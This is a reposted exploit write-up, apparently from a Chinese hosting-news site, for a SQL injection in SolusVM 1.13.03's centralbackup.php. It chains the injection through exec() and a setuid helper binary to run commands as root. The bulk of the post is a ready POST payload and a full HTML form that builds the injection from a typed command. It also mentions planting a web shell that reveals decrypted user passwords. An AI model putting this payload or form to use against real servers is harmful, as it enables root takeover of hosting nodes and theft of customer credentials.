鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

SolusVM 1.13.03 sql注入

来源:互联网 作者:佚名 时间:2015-10-19 08:42
Starting this post with that image seemed appropiate. This one is really easy and lots of servers use this crap called SolusVM. /centralbackup.php : ?php if ($_POST[delete]) { $xc = $db - query(SELECT * FROM centralbackup WHERE id = \ . $_P
Starting this post with that image seemed appropiate. This one is really easy and lots of servers use this crap called SolusVM.
/centralbackup.php:
<?php
if ($_POST['delete']) {
    $xc = $db -> query('SELECT * FROM centralbackup WHERE id = \'' . $_POST['deleteid'] . '\'', true);
    #[...]
    if ($xc[status] == 'failed') {
           exec('php /usr/local/solusvm/system/bus.php -- --comm=deletebackup --serverid=' . $xc['bserver'] . ' --nodeid=' . $vdata['nodeid'] . ' --vserverid=' . $vdata['vserverid'] . ' --filename=' . $xc['filename']);
    #[...]
    }
 }
?>
So what do we have here? SQL Injection? yup! exec()? yup! vulnerable binary that sets setuid to 0? yup!
Let's exploit this, shall we? It's easy, I promise! 3 easy steps!
§  Get yourself an active user with an active VM
§  Log in, click on the VM, copy the GET _v value
§  POST to /centralbackup.php?_v=[value]
delete=1&deleteid=-1' union select 0,0,0,0,0,'failed',';/usr/local/solusvm/core/solusvmc-node --ebtables ";command to run as root";',0#
Or just use this fancy HTML form:
<html><body>
    <script>
    function construct() {
        var sql='-1\' union select 0,0,0,0,0,\'failed\',\';/usr/local/solusvm/core/solusvmc-node --ebtables ";'+document.forms['form']['deleteid'].value+'";\',0#';
        document.forms['form']['deleteid'].value=sql;
        return true;
    }
    </script>
    <form name='form' method='post' action='http://CHANGE_ME:5353/centralbackup.php?_v=CHANGE_ME' onsubmit="return construct();">
    <input type='hidden' name='delete' value='1'>
    CMD: <input type='text' name='deleteid' size='100'>
    <br><input type='submit'>
    </form>
</body></html>
And, as a bonus, here's something to help you pwn. Just wget it to /usr/local/solusvm/www/rofl.php
It can run a command on all nodes, show decrypted passwords for all the users, etc.
 
网友评论
<